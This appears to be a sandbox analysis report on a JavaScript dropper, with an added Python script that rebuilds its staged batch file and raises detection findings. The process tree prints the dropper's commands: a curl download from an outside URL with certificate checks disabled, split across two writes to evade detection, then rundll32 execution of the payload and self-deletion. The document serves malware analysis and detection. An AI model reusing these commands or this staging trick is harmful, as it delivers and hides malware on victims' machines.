Resubmissions

15-11-2023 19:31

231115-x8j9gadf56 10

06-11-2023 04:22

231106-ezdffsgh41 10

Analysis

  • max time kernel
    121s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20231025-en
  • resource tags
    arch:x64 arch:x86 image:win7-20231025-en locale:en-us os:windows7-x64 system
  • submitted
    15-11-2023 19:31

General

  • Target

    2da0b937-aa51-3ea7-a191-69aa951fe75b.js

  • Size

    54KB

  • MD5

    e11d27dad9d6a484061fed8406b1b4ba

  • SHA1

    7a97b146c0ecac61b41a267b45c66fb9ae9e26cd

  • SHA256

    bef13d6455aa5e949c2952d609fd09e34e53b7ead3b3d84c3018e489fb1f027f

  • SHA512

    d0c0db630c0dc813898989cb437d2922e5a53c14792a3487ce560bace02ea6ea50af669e134850a2ec5ef1f3fce08a716a01f166f7b467b39ec042c38c00e1c5

  • SSDEEP

    768:eO9Gvm/iZquBaXkiEhLGgwHi+7GobjM2Eg60cvmqr:eO9GddwHi+7xjVEvZvmI

Score
7/10

Malware Config

Signatures

  • Deletes itself 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\2da0b937-aa51-3ea7-a191-69aa951fe75b.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2136
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\2da0b937-aa51-3ea7-a191-69aa951fe75b.js"
      2⤵
      • Deletes itself
      PID:2080
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo|set /p="cu" > "C:\Users\Admin\AppData\Local\Temp\cumque.q.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2108
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" set /p="cu" 1>"C:\Users\Admin\AppData\Local\Temp\cumque.q.bat""
        3⤵
        PID:2660
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo"
        3⤵
        PID:2632
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo rl "https://saogoncalomedicina.com.br/TOP/4129/320ca3f6/?cable=198832.219" --output "C:\Users\Admin\AppData\Local\Temp\\vero.q" --ssl-no-revoke --insecure --location >> "C:\Users\Admin\AppData\Local\Temp\cumque.q.bat"
      2⤵
      PID:2768
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\cumque.q.bat"
      2⤵
      PID:2812
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\cumque.q.bat"
      2⤵
      PID:2044
    • C:\Windows\System32\rundll32.exe
      "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\\vero.q" scab /k redit739
      2⤵
      PID:1264
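How the tree above stages its downloader, worked as an added Python example (this is not sandbox output or code from the report). `echo|set /p="cu"` writes the two bytes `cu` to cumque.q.bat with no trailing newline, and the separate `echo rl "https://saogoncalomedicina.com.br/TOP/4129/320ca3f6/?cable=198832.219" ... >> cumque.q.bat` appends the remainder, so the file on disk holds the single line `curl "https://saogoncalomedicina.com.br/TOP/4129/320ca3f6/?cable=198832.219" --output "C:\Users\Admin\AppData\Local\Temp\\vero.q" --ssl-no-revoke --insecure --location` although no process command line ever contains the word `curl`. The script replays those redirections over process-creation events constructed from the report's tree (PIDs and command lines copied as listed; the depth markers give each parent), rebuilds the batch file, and raises the findings a detection rule should key on: a curl download with certificate checking disabled, rundll32 loading a non-.dll module from %TEMP% that is that download's target, and the dropper deleting its staging file and itself. The rebuilt file comes to 170 bytes, the Filesize the report lists for cumque.q.bat. The event tuples, tag names and the `_norm`/`WRITE_RE` helpers are this example's own.

```python
"""Replay the cmd redirections from the process tree above, rebuild the staged
batch file, and raise detection findings. Added example built from the report's
process tree; the event tuples, tag names and helpers are this example's own."""
import re

# Constructed from the report's process tree: (pid, parent pid, command line).
# The tree's 1/2/3 depth markers give the parent of each process.
EVENTS = [
    (2136, 0, r"wscript.exe C:\Users\Admin\AppData\Local\Temp\2da0b937-aa51-3ea7-a191-69aa951fe75b.js"),
    (2080, 2136, r'"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\2da0b937-aa51-3ea7-a191-69aa951fe75b.js"'),
    (2108, 2136, r'"C:\Windows\System32\cmd.exe" /c echo|set /p="cu" > "C:\Users\Admin\AppData\Local\Temp\cumque.q.bat"'),
    (2660, 2108, r'C:\Windows\system32\cmd.exe /S /D /c" set /p="cu" 1>"C:\Users\Admin\AppData\Local\Temp\cumque.q.bat""'),
    (2632, 2108, r'C:\Windows\system32\cmd.exe /S /D /c" echo"'),
    (2768, 2136, r'"C:\Windows\System32\cmd.exe" /c echo rl "https://saogoncalomedicina.com.br/TOP/4129/320ca3f6/?cable=198832.219" --output "C:\Users\Admin\AppData\Local\Temp\\vero.q" --ssl-no-revoke --insecure --location >> "C:\Users\Admin\AppData\Local\Temp\cumque.q.bat"'),
    (2812, 2136, r'"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\cumque.q.bat"'),
    (2044, 2136, r'"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\cumque.q.bat"'),
    (1264, 2136, r'"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\\vero.q" scab /k redit739'),
]

# "set /p=<prompt> 1>file" or "echo <text> >>file": capture the text up to the redirection.
WRITE_RE = re.compile(
    r'(?P<op>set /p=|echo )(?P<text>.*?)(?P<redir>1?>>?)\s*"?(?P<path>[^"]+)"?'
)


def _norm(path):
    """Collapse doubled backslashes (cmd accepts them) and case-fold for comparison."""
    return re.sub(r"\\+", r"\\", path).strip().lower()


def reconstruct_writes(events):
    """Rebuild files written through cmd redirections.

    set /p prints its prompt with no newline (cmd strips the prompt's outer
    quotes); echo writes its text plus CRLF and keeps the space that sits
    between the text and the redirection operator.
    """
    files = {}
    for _pid, _ppid, cmdline in events:
        if "|" in cmdline:  # pipeline parent: the child cmd.exe processes do the writing
            continue
        m = WRITE_RE.search(cmdline)
        if not m:
            continue
        path = _norm(m.group("path"))
        if m.group("op") == "set /p=":
            data = m.group("text").strip().strip('"')
        else:
            data = m.group("text") + "\r\n"
        files[path] = (files.get(path, "") if m.group("redir").endswith(">>") else "") + data
    return files


def analyse(events):
    """Return (tag, ...) findings a detection rule should raise for the chain."""
    files = reconstruct_writes(events)
    cmd_of = {pid: cmd for pid, _ppid, cmd in events}
    findings, downloaded = [], set()
    # 1. The rebuilt batch file, not any process command line, holds the curl call.
    for path, content in files.items():
        for line in content.splitlines():
            if line.lower().startswith("curl "):
                out = re.search(r'--output\s+"?([^"\s]+)', line)
                if out:
                    downloaded.add(_norm(out.group(1)))
                weak = tuple(f for f in ("--insecure", "-k", "--ssl-no-revoke") if f in line.split())
                findings.append(("curl-download", path, weak))
    for pid, ppid, cmd in events:
        # 2. rundll32 loading a module without a .dll extension, and one that was just downloaded.
        m = re.search(r'rundll32\.exe"?\s+"?(?P<mod>[^"\s]+)"?\s+(?P<export>\S+)', cmd, re.I)
        if m:
            mod = _norm(m.group("mod"))
            if not mod.endswith(".dll"):
                findings.append(("rundll32-non-dll", mod, m.group("export")))
            if mod in downloaded:
                findings.append(("downloaded-payload-executed", mod, m.group("export")))
        # 3. Cleanup: deleting the staging file, or the parent's own script (self-delete).
        d = re.search(r'/c\s+del\s+"?([^"]+)"?', cmd, re.I)
        if d:
            target = _norm(d.group(1))
            if target in files:
                findings.append(("staged-file-deleted", target, pid))
            elif target in _norm(cmd_of.get(ppid, "")):
                findings.append(("self-delete", target, pid))
    return findings


if __name__ == "__main__":
    for path, content in reconstruct_writes(EVENTS).items():
        print(f"{path} ({len(content)} bytes): {content.rstrip()}")
    for finding in analyse(EVENTS):
        print(*finding)
```

The report's Network section is empty and vero.q does not appear under Downloads, so there is no evidence the download completed in this run; curl.exe is not part of Windows 7 (it ships with Windows 10 1803 and later), so on this image the batch file most likely failed at that step. The rundll32 launch of a non-.dll file from %TEMP% with an export name and arguments is the step to alert on regardless of whether the fetch succeeds.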

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\cumque.q.bat

    Filesize

    170B

    MD5

    1198fa4486b382bc05b322fe52655020

    SHA1

    2d72bab9a1d3fdb868a55c169cd4b30a650f6f84

    SHA256

    4d7c7e32ed6a3bd24f3e2e32b2ace831349c0caace4e7c1d3fd6d065f269b8bc

    SHA512

    a30e51cf8ae6a6b62717d5f7ed1d0bdd32eefd3c4780a5a2d1ec7322885304c200aa1b5f8e1eedd5e7b0fa0ace384fb1452cb9c9c58bde92833772e88baa5d9f
